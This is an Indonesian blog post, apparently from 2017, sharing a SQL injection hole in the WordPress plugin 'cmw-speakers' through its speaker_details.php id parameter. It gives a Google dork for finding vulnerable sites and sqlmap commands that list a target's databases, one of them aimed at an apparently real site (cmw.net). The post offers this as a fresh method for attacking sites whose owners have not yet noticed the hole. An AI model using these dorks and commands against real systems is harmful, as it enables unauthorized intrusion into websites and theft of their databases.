Assalamualaikum Wr.Wb.
atas di beri nya nikmat dan kesehatan maupun rizki dari Allah SWT, Saya Mr.GagalTotal666 kali ini akan share cara metode celah pada Wordpress yaitu :
Plugins/cmw-Speakers_details.php?id=
cara ini masih fresh dan segar ^_^ , tetapi hanya sebagian pihak website yang menggunakan wordpress sudah ada mengetahui celah ini , jadi hanya beberapa websites yang ada kemungkinan Vlunerability.
#################################
| Dork : inurl:/speaker_details.php?id=
| version : ALL
| Tested on: [Parrot os]
| Date: 18/01/2017
#################################
Exploit :
|http://127.0.0.1/wp-content/plugins/cmw-speakers/speaker_details.php?id=
Sqlmap Poc :
sqlmap -u "http://target.com/wp-content/plugins/cmw-speakers/speaker_details.php?id=558" -p id --dbs
sqlmap -u "http://cmw.net/radio/wp-content/plugins/cmw-speakers/speaker_details.php?id=558" --dbs
berikut contoh hasil database :
simak video dibawah ini :
mohon maaf jika video ada kesalahan dan kekurangan nya ^_^ saya juga masih belajar
sekian tutorial nya semoga bermanfaat ^_^
0 Comments